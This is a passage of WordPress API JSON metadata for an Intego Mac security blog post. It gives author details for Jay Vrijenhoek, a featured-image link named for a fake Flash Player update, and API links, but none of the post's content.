Vrijenhoek","image":{"@type":"ImageObject","@id":"https:\/\/www.intego.com\/mac-security-blog\/#personlogo","inLanguage":"en-US","url":"https:\/\/secure.gravatar.com\/avatar\/8f43effd03d0bb31acff4b88613f0d4a?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/8f43effd03d0bb31acff4b88613f0d4a?s=96&d=mm&r=g","caption":"Jay Vrijenhoek"},"description":"Jay Vrijenhoek is an IT consultant with a passion for Mac security research.","url":"https:\/\/www.intego.com\/mac-security-blog\/author\/jay-vrijenhoek\/"}]}},"jetpack_featured_media_url":"https:\/\/www.intego.com\/mac-security-blog\/wp-content\/uploads\/2016\/10\/SilverInstaller-Fake-Flash-Player-Update-Featured.jpg","jetpack_publicize_connections":[],"jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/p4VAYd-fdt","amp_enabled":true,"_links":{"self":[{"href":"https:\/\/origin.intego.com\/mac-security-blog\/wp-json\/wp\/v2\/posts\/58495"}],"collection":[{"href":"https:\/\/origin.intego.com\/mac-security-blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/origin.intego.com\/mac-security-blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/origin.intego.com\/mac-security-blog\/wp-json\/wp\/v2\/users\/79"}],"replies":[{"embeddable":true,"href":"https:\/\/origin.intego.com\/mac-security-blog\/wp-json\/wp\/v2\/comments?post=58495"}],"version-history":[{"count":16,"href":"https:\/\/origin.intego.com\/mac-security-blog\/wp-json\/wp\/v2\/posts\/58495\/revisions"}],"predecessor-version":[{"id":58894,"href":"https:\/\/origin.intego.com\/mac-security-blog\/wp-json\/wp\/v2\/posts\/58495\/revisions\/58894"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/origin.intego.com\/mac-security-blog\/wp-json\/wp\/v2\/media\/58534"}],"wp:attachment":[{"href":"https:\/\/origin.intego.com\/mac-security-blog\/wp-json\/wp\/v2\/media?parent=58495"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/origin.intego.com\/mac-security-blog\/wp-json\/wp\/v2\/categories?post=58495"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/origin.intego.com\/mac-security-blog\/wp-json\/wp\/v2\/tags?post=58495"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}